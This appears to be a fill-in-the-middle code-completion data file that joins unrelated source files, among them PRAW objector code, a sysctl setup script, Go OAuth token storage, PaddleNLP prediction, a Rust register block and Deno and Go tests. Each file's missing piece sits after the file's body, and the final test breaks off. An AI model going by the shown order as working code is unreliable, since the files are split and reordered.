parser = self.parsers[self._reddit.config.kinds["redditor"]]
elif {"text", "url"}.issubset(data):
if "color" in data or "linkUrl" in data:
parser = self.parsers["Button"]
else:
parser = self.parsers["MenuLink"]
elif {"children", "text"}.issubset(data):
parser = self.parsers["Submenu"]
elif {"height", "url", "width"}.issubset(data):
parser = self.parsers["Image"]
elif {"isSubscribed", "name", "subscribers"}.issubset(data):
# discards icon and subscribed information
return self._reddit.subreddit(data["name"])
elif {"authorFlairType", "name"}.issubset(data):
# discards flair information
return self._reddit.redditor(data["name"])
elif {"parent_id"}.issubset(data):
parser = self.parsers[self._reddit.config.kinds["comment"]]
elif "collection_id" in data.keys():
parser = self.parsers["Collection"]
elif {"moderators", "moderatorIds", "allUsersLoaded", "subredditId"}.issubset(
data
):
data = snake_case_keys(data)
moderators = []
for mod_id in data["moderator_ids"]:
mod = snake_case_keys(data["moderators"][mod_id])
mod["mod_permissions"] = list(mod["mod_permissions"].keys())
moderators.append(mod)
data["moderators"] = moderators
parser = self.parsers["moderator-list"]
elif "username" in data.keys():
data["name"] = data.pop("username")
parser = self.parsers[self._reddit.config.kinds["redditor"]]
else:
if "user" in data:
parser = self.parsers[self._reddit.config.kinds["redditor"]]
data["user"] = parser.parse({"name": data["user"]}, self._reddit)
return data
return parser.parse(data, self._reddit)
def objectify(
self, data: Optional[Union[Dict[str, Any], List[Any]]]
) -> Optional[Union[RedditBase, Dict[str, Any], List[Any]]]:
"""Create RedditBase objects from data.
:param data: The structured data.
:returns: An instance of :class:`~.RedditBase`, or ``None`` if given ``data`` is
``None``.
"""
# pylint: disable=too-many-return-statements
if data is None: # 204 no content
return None
if isinstance(data, list):
return [self.objectify(item) for item in data]
if "json" in data and "errors" in data["json"]:
errors = data["json"]["errors"]
if len(errors) > 0:
raise RedditAPIException(errors)
if "kind" in data and (
"shortName" in data or data["kind"] in ("menu", "moderators")
):
# This is a widget
parser = self.parsers.get(data["kind"], self.parsers["widget"])
return parser.parse(data, self._reddit)
if {"kind", "data"}.issubset(data) and data["kind"] in self.parsers:
parser = self.parsers[data["kind"]]
return parser.parse(data["data"], self._reddit)
if "json" in data and "data" in data["json"]:
if "websocket_url" in data["json"]["data"]:
return data
if "things" in data["json"]["data"]: # Submission.reply
return self.objectify(data["json"]["data"]["things"])
if "rules" in data["json"]["data"]:
return self.objectify(loads(data["json"]["data"]["rules"]))
if "url" in data["json"]["data"]: # Subreddit.submit
# The URL is the URL to the submission, so it's removed.
del data["json"]["data"]["url"]
parser = self.parsers[self._reddit.config.kinds["submission"]]
if data["json"]["data"]["id"].startswith(
f"{self._reddit.config.kinds['submission']}_"
):
# With polls, Reddit returns a fullname but calls it an "id". This
# fixes this by coercing the fullname into an id.
data["json"]["data"]["id"] = data["json"]["data"]["id"].split(
"_", 1
)[1]
else:
parser = self.parsers["LiveUpdateEvent"]
return parser.parse(data["json"]["data"], self._reddit)
if "rules" in data:
return self.objectify(data["rules"])
elif isinstance(data, dict):
return self._objectify_dict(data)
return data
| __init__ |
06-update-sysctl.py | #!/usr/bin/env python3
import logging
import sys
import subprocess
from taupage import configure_logging, get_config
def main():
|
if __name__ == '__main__':
main()
| """Configure custom sysctl parameters
    If a sysctl section is present, adds the configured parameters to sysctl and reloads it.
"""
CUSTOM_SYSCTL_CONF = '/etc/sysctl.d/99-custom.conf'
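    # Illustrative Taupage user-data snippet consumed by this script (keys and values
    # are placeholder assumptions, not defaults shipped with Taupage):
    #
    #   sysctl:
    #     net.ipv4.tcp_keepalive_time: 300
    #     vm.swappiness: 10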
configure_logging()
config = get_config()
sysctl = config.get('sysctl')
if sysctl is None:
sys.exit(0)
try:
sysctl_entries = ['{} = {}'.format(key, value) for key, value in sysctl.items()]
with open(CUSTOM_SYSCTL_CONF, 'w') as file:
file.write('\n'.join(sysctl_entries)+'\n')
logging.info('Successfully written sysctl parameters')
except Exception as e:
logging.error('Failed to write sysctl parameters')
logging.exception(e)
sys.exit(1)
try:
exitcode = subprocess.call(['/sbin/sysctl', '-p', CUSTOM_SYSCTL_CONF])
if exitcode != 0:
logging.error('Reloading sysctl failed with exitcode {}'.format(exitcode))
sys.exit(1)
logging.info('Successfully reloaded sysctl parameters')
except Exception as e:
logging.error('Failed to reload sysctl')
logging.exception(e)
sys.exit(1) |
refresh.go | package datastore
import (
"context"
"go.mercari.io/datastore"
)
// KindRefresh is datastore kind name of OAuth2 refresh token
const KindRefresh = "refresh"
type refresh struct {
RefreshToken string `datastore:"-"`
AccessToken string `datastore:",noindex"`
}
func newRefresh(refToken, accToken string) *refresh {
return &refresh{
RefreshToken: refToken,
AccessToken: accToken,
}
}
type refreshStorage struct {
client datastore.Client
}
func | (client datastore.Client) *refreshStorage {
return &refreshStorage{client: client}
}
func (r *refreshStorage) put(ctx context.Context, ref *refresh) error {
key := r.client.NameKey(KindRefresh, ref.RefreshToken, nil)
_, err := r.client.Put(ctx, key, ref)
return err
}
func (r *refreshStorage) get(ctx context.Context, token string) (*refresh, error) {
key := r.client.NameKey(KindRefresh, token, nil)
ref := new(refresh)
if err := r.client.Get(ctx, key, ref); err != nil {
return nil, err
}
ref.RefreshToken = token
return ref, nil
}
func (r *refreshStorage) delete(ctx context.Context, token string) error {
key := r.client.NameKey(KindRefresh, token, nil)
return r.client.Delete(ctx, key)
}
| newRefreshStorage |
predict.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import paddle
import paddle.nn.functional as F
import paddlenlp as ppnlp
from paddlenlp.data import JiebaTokenizer, Stack, Tuple, Pad, Vocab
from utils import preprocess_prediction_data
# yapf: disable
parser = argparse.ArgumentParser(__doc__)
parser.add_argument('--device', choices=['cpu', 'gpu', 'xpu'], default="gpu", help="Select which device to train model, defaults to gpu.")
parser.add_argument("--batch_size", type=int, default=1, help="Total examples' number of a batch for training.")
parser.add_argument("--vocab_path", type=str, default="./senta_word_dict.txt", help="The path to vocabulary.")
parser.add_argument('--network', choices=['bow', 'lstm', 'bilstm', 'gru', 'bigru', 'rnn', 'birnn', 'bilstm_attn', 'cnn', 'textcnn'],
default="bilstm", help="Select which network to train, defaults to bilstm.")
parser.add_argument("--params_path", type=str, default='./checkpoints/final.pdparams', help="The path of model parameter to be loaded.")
args = parser.parse_args()
# yapf: enable
def | (model, data, label_map, batch_size=1, pad_token_id=0):
"""
Predicts the data labels.
Args:
model (obj:`paddle.nn.Layer`): A model to classify texts.
        data (obj:`List(Example)`): The processed data, each element of which is an Example (namedtuple) object.
            An Example object contains `text` (word_ids) and `seq_len` (sequence length).
label_map(obj:`dict`): The label id (key) to label str (value) map.
batch_size(obj:`int`, defaults to 1): The number of batch.
pad_token_id(obj:`int`, optional, defaults to 0): The pad token index.
Returns:
results(obj:`dict`): All the predictions labels.
"""
    # Separates the data into batches.
batches = [
data[idx:idx + batch_size] for idx in range(0, len(data), batch_size)
]
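    # batchify_fn pads every token-id sequence in a batch to the same length with the
    # pad token and stacks the sequence lengths as int64 values.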
batchify_fn = lambda samples, fn=Tuple(
Pad(axis=0, pad_val=pad_token_id), # input_ids
Stack(dtype="int64"), # seq len
): [data for data in fn(samples)]
results = []
model.eval()
for batch in batches:
texts, seq_lens = batchify_fn(batch)
texts = paddle.to_tensor(texts)
seq_lens = paddle.to_tensor(seq_lens)
logits = model(texts, seq_lens)
probs = F.softmax(logits, axis=1)
idx = paddle.argmax(probs, axis=1).numpy()
idx = idx.tolist()
labels = [label_map[i] for i in idx]
results.extend(labels)
return results
if __name__ == "__main__":
paddle.set_device(args.device.lower())
# Loads vocab.
vocab = Vocab.load_vocabulary(
args.vocab_path, unk_token='[UNK]', pad_token='[PAD]')
label_map = {0: 'negative', 1: 'positive'}
    # Constructs the network.
model = ppnlp.models.Senta(
network=args.network, vocab_size=len(vocab), num_classes=len(label_map))
# Loads model parameters.
state_dict = paddle.load(args.params_path)
model.set_dict(state_dict)
print("Loaded parameters from %s" % args.params_path)
# Firstly pre-processing prediction data and then do predict.
data = [
'这个宾馆比较陈旧了,特价的房间也很一般。总体来说一般',
'怀着十分激动的心情放映,可是看着看着发现,在放映完毕后,出现一集米老鼠的动画片',
'作为老的四星酒店,房间依然很整洁,相当不错。机场接机服务很好,可以在车上办理入住手续,节省时间。',
]
tokenizer = JiebaTokenizer(vocab)
examples = preprocess_prediction_data(data, tokenizer)
results = predict(
model,
examples,
label_map=label_map,
batch_size=args.batch_size,
pad_token_id=vocab.token_to_idx.get("[PAD]", 0))
for idx, text in enumerate(data):
print('Data: {} \t Label: {}'.format(text, results[idx]))
| predict |
vanilla-tiptaptip.js | /*
* Plugin Name: Vanilla-JS Tip Tap Tip
* Version: 0.1.1
* Plugin URL: https://github.com/Darklg/JavaScriptUtilities
* JavaScriptUtilities Vanilla-JS may be freely distributed under the MIT license.
*/
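/*
 * Usage sketch (illustrative: the selector and delay below are placeholder assumptions):
 *
 *   var typer = new dkJSUTipTapTip(document.querySelector('[data-taptext]'), { delay: 80 });
 *   typer.launch();
 *
 * The target element must carry a data-taptext attribute; its value is typed out
 * character by character, one character every `delay` milliseconds.
 */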
var dkJSUTipTapTip = function(item, options) {
'use strict';
var self = this;
self.item = false;
self.taptext = '';
self.opt = {};
/* ----------------------------------------------------------
Init
---------------------------------------------------------- */
self.init = function(item, opt) {
if (!item) {
return false;
}
self.opt = self.getOptions(opt);
self.item = item;
self.taptext = item.getAttribute('data-taptext').split('');
};
self.getOptions = function(opt) {
var baseOptions = {
delay: 50
};
if (typeof opt != 'object') {
return baseOptions;
}
if (opt.delay && isNumber(opt.delay)) {
baseOptions.delay = parseInt(opt.delay, 10);
}
return baseOptions;
};
/* ----------------------------------------------------------
Launch
---------------------------------------------------------- */
self.launch = function() {
if (!self.item) {
return false;
}
self.interval = setInterval(self.intervalTap, self.opt.delay);
};
self.intervalTap = function() {
self.item.appendChild(document.createTextNode(self.taptext.shift()));
if (self.taptext.length <= 0) {
clearInterval(self.interval);
}
};
/* ----------------------------------------------------------
Utilities
---------------------------------------------------------- */
function | (n) {
return !isNaN(parseFloat(n)) && isFinite(n);
}
self.init(item, options);
}; | isNumber |
pc.rs | #[doc = r"Register block"]
#[repr(C)]
pub struct RegisterBlock {
_reserved0: [u8; 64usize],
#[doc = "0x40 - Port C Input"]
pub pcin: PCIN,
#[doc = "0x42 - Port C Output"]
pub pcout: PCOUT,
#[doc = "0x44 - Port C Direction"]
pub pcdir: PCDIR,
#[doc = "0x46 - Port C Resistor Enable"]
pub pcren: PCREN,
_reserved4: [u8; 2usize],
#[doc = "0x4a - Port C Select 0"]
pub pcsel0: PCSEL0,
#[doc = "0x4c - Port C Select 1"]
pub pcsel1: PCSEL1,
_reserved6: [u8; 8usize],
#[doc = "0x56 - Port C Complement Select"]
pub pcselc: PCSELC,
#[doc = "0x58 - Port C Interrupt Edge Select"]
pub pcies: PCIES,
#[doc = "0x5a - Port C Interrupt Enable"]
pub pcie: PCIE,
#[doc = "0x5c - Port C Interrupt Flag"]
pub pcifg: PCIFG,
}
#[doc = "Port C Input\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcin](pcin) module"]
pub type PCIN = crate::Reg<u16, _PCIN>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCIN;
#[doc = "`read()` method returns [pcin::R](pcin::R) reader structure"]
impl crate::Readable for PCIN {}
#[doc = "`write(|w| ..)` method takes [pcin::W](pcin::W) writer structure"]
impl crate::Writable for PCIN {}
#[doc = "Port C Input"]
pub mod pcin;
#[doc = "Port C Output\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcout](pcout) module"]
pub type PCOUT = crate::Reg<u16, _PCOUT>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCOUT;
#[doc = "`read()` method returns [pcout::R](pcout::R) reader structure"]
impl crate::Readable for PCOUT {}
#[doc = "`write(|w| ..)` method takes [pcout::W](pcout::W) writer structure"]
impl crate::Writable for PCOUT {}
#[doc = "Port C Output"]
pub mod pcout;
#[doc = "Port C Direction\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcdir](pcdir) module"]
pub type PCDIR = crate::Reg<u16, _PCDIR>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCDIR;
#[doc = "`read()` method returns [pcdir::R](pcdir::R) reader structure"]
impl crate::Readable for PCDIR {}
#[doc = "`write(|w| ..)` method takes [pcdir::W](pcdir::W) writer structure"]
impl crate::Writable for PCDIR {}
#[doc = "Port C Direction"]
pub mod pcdir;
#[doc = "Port C Resistor Enable\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcren](pcren) module"]
pub type PCREN = crate::Reg<u16, _PCREN>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCREN;
#[doc = "`read()` method returns [pcren::R](pcren::R) reader structure"]
impl crate::Readable for PCREN {}
#[doc = "`write(|w| ..)` method takes [pcren::W](pcren::W) writer structure"]
impl crate::Writable for PCREN {}
#[doc = "Port C Resistor Enable"]
pub mod pcren;
#[doc = "Port C Select 0\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcsel0](pcsel0) module"]
pub type PCSEL0 = crate::Reg<u16, _PCSEL0>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCSEL0;
#[doc = "`read()` method returns [pcsel0::R](pcsel0::R) reader structure"]
impl crate::Readable for PCSEL0 {}
#[doc = "`write(|w| ..)` method takes [pcsel0::W](pcsel0::W) writer structure"]
impl crate::Writable for PCSEL0 {}
#[doc = "Port C Select 0"]
pub mod pcsel0;
#[doc = "Port C Select 1\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcsel1](pcsel1) module"]
pub type PCSEL1 = crate::Reg<u16, _PCSEL1>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCSEL1;
#[doc = "`read()` method returns [pcsel1::R](pcsel1::R) reader structure"]
impl crate::Readable for PCSEL1 {}
#[doc = "`write(|w| ..)` method takes [pcsel1::W](pcsel1::W) writer structure"]
impl crate::Writable for PCSEL1 {}
#[doc = "Port C Select 1"]
pub mod pcsel1;
#[doc = "Port C Complement Select\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcselc](pcselc) module"]
pub type PCSELC = crate::Reg<u16, _PCSELC>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCSELC;
#[doc = "`read()` method returns [pcselc::R](pcselc::R) reader structure"]
impl crate::Readable for PCSELC {}
#[doc = "`write(|w| ..)` method takes [pcselc::W](pcselc::W) writer structure"]
impl crate::Writable for PCSELC {}
#[doc = "Port C Complement Select"]
pub mod pcselc;
#[doc = "Port C Interrupt Edge Select\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcies](pcies) module"]
pub type PCIES = crate::Reg<u16, _PCIES>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCIES;
#[doc = "`read()` method returns [pcies::R](pcies::R) reader structure"]
impl crate::Readable for PCIES {}
#[doc = "`write(|w| ..)` method takes [pcies::W](pcies::W) writer structure"]
impl crate::Writable for PCIES {}
#[doc = "Port C Interrupt Edge Select"]
pub mod pcies;
#[doc = "Port C Interrupt Enable\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcie](pcie) module"]
pub type PCIE = crate::Reg<u16, _PCIE>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCIE;
#[doc = "`read()` method returns [pcie::R](pcie::R) reader structure"]
impl crate::Readable for PCIE {}
#[doc = "`write(|w| ..)` method takes [pcie::W](pcie::W) writer structure"]
impl crate::Writable for PCIE {}
#[doc = "Port C Interrupt Enable"]
pub mod pcie;
#[doc = "Port C Interrupt Flag\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcifg](pcifg) module"]
pub type PCIFG = crate::Reg<u16, _PCIFG>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCIFG;
#[doc = "`read()` method returns [pcifg::R](pcifg::R) reader structure"]
impl crate::Readable for PCIFG {}
#[doc = "`write(|w| ..)` method takes [pcifg::W](pcifg::W) writer structure"]
| impl crate::Writable for PCIFG {}
#[doc = "Port C Interrupt Flag"]
pub mod pcifg; | |
file_server_test.ts | // Copyright 2018-2019 the Deno authors. All rights reserved. MIT license.
import { test } from "../testing/mod.ts";
import { assert, assertEquals } from "../testing/asserts.ts";
import { BufReader } from "../io/bufio.ts";
import { TextProtoReader } from "../textproto/mod.ts";
let fileServer: Deno.Process;
async function | (): Promise<void> {
fileServer = Deno.run({
args: [
Deno.execPath(),
"run",
"--allow-read",
"--allow-net",
"http/file_server.ts",
".",
"--cors"
],
stdout: "piped"
});
// Once fileServer is ready it will write to its stdout.
const r = new TextProtoReader(new BufReader(fileServer.stdout!));
const s = await r.readLine();
assert(s !== Deno.EOF && s.includes("server listening"));
}
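// Stops the file server subprocess and closes its piped stdout.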
function killFileServer(): void {
fileServer.close();
fileServer.stdout!.close();
}
test(async function serveFile(): Promise<void> {
await startFileServer();
try {
const res = await fetch("http://localhost:4500/README.md");
assert(res.headers.has("access-control-allow-origin"));
assert(res.headers.has("access-control-allow-headers"));
const downloadedFile = await res.text();
const localFile = new TextDecoder().decode(
await Deno.readFile("README.md")
);
assertEquals(downloadedFile, localFile);
} finally {
killFileServer();
}
});
test(async function serveDirectory(): Promise<void> {
await startFileServer();
try {
const res = await fetch("http://localhost:4500/");
assert(res.headers.has("access-control-allow-origin"));
assert(res.headers.has("access-control-allow-headers"));
const page = await res.text();
assert(page.includes("README.md"));
// `Deno.FileInfo` is not completely compatible with Windows yet
// TODO: `mode` should work correctly in the future.
// Correct this test case accordingly.
Deno.build.os !== "win" &&
assert(/<td class="mode">(\s)*\([a-zA-Z-]{10}\)(\s)*<\/td>/.test(page));
Deno.build.os === "win" &&
assert(/<td class="mode">(\s)*\(unknown mode\)(\s)*<\/td>/.test(page));
assert(page.includes(`<a href="/README.md">README.md</a>`));
} finally {
killFileServer();
}
});
test(async function serveFallback(): Promise<void> {
await startFileServer();
try {
const res = await fetch("http://localhost:4500/badfile.txt");
assert(res.headers.has("access-control-allow-origin"));
assert(res.headers.has("access-control-allow-headers"));
assertEquals(res.status, 404);
} finally {
killFileServer();
}
});
test(async function serveFileWithSpaceInName(): Promise<void> {
await startFileServer();
try {
const res = await fetch(
"http://localhost:4500/http/testdata/test%20file.txt"
);
assert(res.headers.has("access-control-allow-origin"));
assert(res.headers.has("access-control-allow-headers"));
assertEquals(res.status, 200);
} finally {
killFileServer();
}
});
| startFileServer |
estimatefee_test.go | // Copyright (c) 2016 The btcsuite developers
// Copyright (c) 2018-2019 The Soteria DAG developers
// Use of this source code is governed by an ISC
// license that can be found in the LICENSE file.
package mempool
import (
"bytes"
"math/rand"
"testing"
"github.com/soteria-dag/soterd/chaincfg/chainhash"
"github.com/soteria-dag/soterd/miningdag"
"github.com/soteria-dag/soterd/soterutil"
"github.com/soteria-dag/soterd/wire"
)
// newTestFeeEstimator creates a feeEstimator with some different parameters
// for testing purposes.
func newTestFeeEstimator(binSize, maxReplacements, maxRollback uint32) *FeeEstimator {
return &FeeEstimator{
maxRollback: maxRollback,
lastKnownHeight: 0,
binSize: int32(binSize),
minRegisteredBlocks: 0,
maxReplacements: int32(maxReplacements),
observed: make(map[chainhash.Hash]*observedTransaction),
dropped: make([]*registeredBlock, 0, maxRollback),
}
}
// lastBlock is a linked list of the block hashes which have been
// processed by the test FeeEstimator.
type lastBlock struct {
hash *chainhash.Hash
prev *lastBlock
}
// estimateFeeTester interacts with the FeeEstimator to keep track
// of its expected state.
type estimateFeeTester struct {
ef *FeeEstimator
t *testing.T
version int32
height int32
last *lastBlock
}
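// testTx creates a test transaction with a unique version number, the tester's
// current height and the given fee.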
func (eft *estimateFeeTester) testTx(fee soterutil.Amount) *TxDesc {
eft.version++
return &TxDesc{
TxDesc: miningdag.TxDesc{
Tx: soterutil.NewTx(&wire.MsgTx{
Version: eft.version,
}),
Height: eft.height,
Fee: int64(fee),
},
StartingPriority: 0,
}
}
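// expectedFeePerKilobyte returns the fee rate implied by a transaction's fee
// and serialized size.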
func expectedFeePerKilobyte(t *TxDesc) SotoPerKilobyte {
size := float64(t.TxDesc.Tx.MsgTx().SerializeSize())
fee := float64(t.TxDesc.Fee)
return nanoSoterPerByte(fee / size).ToSotoPerKb()
}
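// newBlock registers a block containing the given transactions at the next
// height and remembers its hash for later rollback.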
func (eft *estimateFeeTester) newBlock(txs []*wire.MsgTx) {
eft.height++
block := soterutil.NewBlock(&wire.MsgBlock{
Transactions: txs,
})
block.SetHeight(eft.height)
eft.last = &lastBlock{block.Hash(), eft.last}
eft.ef.RegisterBlock(block)
}
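// rollback undoes the most recently registered block and restores the
// tester's height and block list.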
func (eft *estimateFeeTester) rollback() {
if eft.last == nil {
return
}
err := eft.ef.Rollback(eft.last.hash)
if err != nil {
eft.t.Errorf("Could not rollback: %v", err)
}
eft.height--
eft.last = eft.last.prev
}
// TestEstimateFee tests basic functionality in the FeeEstimator.
func TestEstimateFee(t *testing.T) {
ef := newTestFeeEstimator(5, 3, 1)
eft := estimateFeeTester{ef: ef, t: t}
// Try with no txs and get zero for all queries.
expected := SotoPerKilobyte(0.0)
for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i)
if estimated != expected {
t.Errorf("Estimate fee error: expected %f when estimator is empty; got %f", expected, estimated)
}
}
// Now insert a tx.
tx := eft.testTx(1000000)
ef.ObserveTransaction(tx)
// Expected should still be zero because this is still in the mempool.
expected = SotoPerKilobyte(0.0)
for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i)
if estimated != expected {
t.Errorf("Estimate fee error: expected %f when estimator has one tx in mempool; got %f", expected, estimated)
}
}
// Change minRegisteredBlocks to make sure that works. Error return
// value expected.
ef.minRegisteredBlocks = 1
expected = SotoPerKilobyte(-1.0) |
if estimated != expected {
t.Errorf("Estimate fee error: expected %f before any blocks have been registered; got %f", expected, estimated)
}
}
// Record a block with the new tx.
eft.newBlock([]*wire.MsgTx{tx.Tx.MsgTx()})
expected = expectedFeePerKilobyte(tx)
for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i)
if estimated != expected {
t.Errorf("Estimate fee error: expected %f when one tx is binned; got %f", expected, estimated)
}
}
// Roll back the last block; this was an orphan block.
ef.minRegisteredBlocks = 0
eft.rollback()
expected = SotoPerKilobyte(0.0)
for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i)
if estimated != expected {
t.Errorf("Estimate fee error: expected %f after rolling back block; got %f", expected, estimated)
}
}
// Record an empty block and then a block with the new tx.
// This test was made because of a bug that only appeared when there
// were no transactions in the first bin.
eft.newBlock([]*wire.MsgTx{})
eft.newBlock([]*wire.MsgTx{tx.Tx.MsgTx()})
expected = expectedFeePerKilobyte(tx)
for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i)
if estimated != expected {
t.Errorf("Estimate fee error: expected %f when one tx is binned; got %f", expected, estimated)
}
}
// Create some more transactions.
txA := eft.testTx(500000)
txB := eft.testTx(2000000)
txC := eft.testTx(4000000)
ef.ObserveTransaction(txA)
ef.ObserveTransaction(txB)
ef.ObserveTransaction(txC)
// Record 7 empty blocks.
for i := 0; i < 7; i++ {
eft.newBlock([]*wire.MsgTx{})
}
// Mine the first tx.
eft.newBlock([]*wire.MsgTx{txA.Tx.MsgTx()})
// Now the estimated amount should depend on the value
// of the argument to estimate fee.
for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i)
if i > 2 {
expected = expectedFeePerKilobyte(txA)
} else {
expected = expectedFeePerKilobyte(tx)
}
if estimated != expected {
t.Errorf("Estimate fee error: expected %f on round %d; got %f", expected, i, estimated)
}
}
// Record 5 more empty blocks.
for i := 0; i < 5; i++ {
eft.newBlock([]*wire.MsgTx{})
}
// Mine the next tx.
eft.newBlock([]*wire.MsgTx{txB.Tx.MsgTx()})
// Now the estimated amount should depend on the value
// of the argument to estimate fee.
for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i)
if i <= 2 {
expected = expectedFeePerKilobyte(txB)
} else if i <= 8 {
expected = expectedFeePerKilobyte(tx)
} else {
expected = expectedFeePerKilobyte(txA)
}
if estimated != expected {
t.Errorf("Estimate fee error: expected %f on round %d; got %f", expected, i, estimated)
}
}
// Record 10 more empty blocks.
for i := 0; i < 10; i++ {
eft.newBlock([]*wire.MsgTx{})
}
// Mine txC.
eft.newBlock([]*wire.MsgTx{txC.Tx.MsgTx()})
// This should have no effect on the outcome because too
// many blocks have been mined for txC to be recorded.
for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i)
if i <= 2 {
expected = expectedFeePerKilobyte(txC)
} else if i <= 8 {
expected = expectedFeePerKilobyte(txB)
} else if i <= 8+6 {
expected = expectedFeePerKilobyte(tx)
} else {
expected = expectedFeePerKilobyte(txA)
}
if estimated != expected {
t.Errorf("Estimate fee error: expected %f on round %d; got %f", expected, i, estimated)
}
}
}
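// estimates queries the estimator at every confirmation depth and checks that
// the results come back in descending order.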
func (eft *estimateFeeTester) estimates() [estimateFeeDepth]SotoPerKilobyte {
// Generate estimates
var estimates [estimateFeeDepth]SotoPerKilobyte
for i := 0; i < estimateFeeDepth; i++ {
estimates[i], _ = eft.ef.EstimateFee(uint32(i + 1))
}
// Check that all estimated fee results go in descending order.
for i := 1; i < estimateFeeDepth; i++ {
if estimates[i] > estimates[i-1] {
eft.t.Error("Estimates not in descending order; got ",
estimates[i], " for estimate ", i, " and ", estimates[i-1], " for ", (i - 1))
panic("invalid state.")
}
}
return estimates
}
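// round observes txPerRound new transactions, mines up to txPerBlock of the
// unmined mempool transactions into a new block, and returns the extended
// transaction and estimate histories.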
func (eft *estimateFeeTester) round(txHistory [][]*TxDesc,
estimateHistory [][estimateFeeDepth]SotoPerKilobyte,
txPerRound, txPerBlock uint32) ([][]*TxDesc, [][estimateFeeDepth]SotoPerKilobyte) {
// generate new txs.
var newTxs []*TxDesc
for i := uint32(0); i < txPerRound; i++ {
newTx := eft.testTx(soterutil.Amount(rand.Intn(1000000)))
eft.ef.ObserveTransaction(newTx)
newTxs = append(newTxs, newTx)
}
// Generate mempool.
mempool := make(map[*observedTransaction]*TxDesc)
for _, h := range txHistory {
for _, t := range h {
if o, exists := eft.ef.observed[*t.Tx.Hash()]; exists && o.mined == miningdag.UnminedHeight {
mempool[o] = t
}
}
}
// generate new block, with no duplicates.
i := uint32(0)
newBlockList := make([]*wire.MsgTx, 0, txPerBlock)
for _, t := range mempool {
newBlockList = append(newBlockList, t.TxDesc.Tx.MsgTx())
i++
if i == txPerBlock {
break
}
}
// Register a new block.
eft.newBlock(newBlockList)
// Compute the estimates after this round.
estimates := eft.estimates()
// Return the updated histories.
return append(txHistory, newTxs), append(estimateHistory, estimates)
}
// TestEstimateFeeRollback tests the rollback function, which undoes the
// effect of adding a new block.
func TestEstimateFeeRollback(t *testing.T) {
txPerRound := uint32(7)
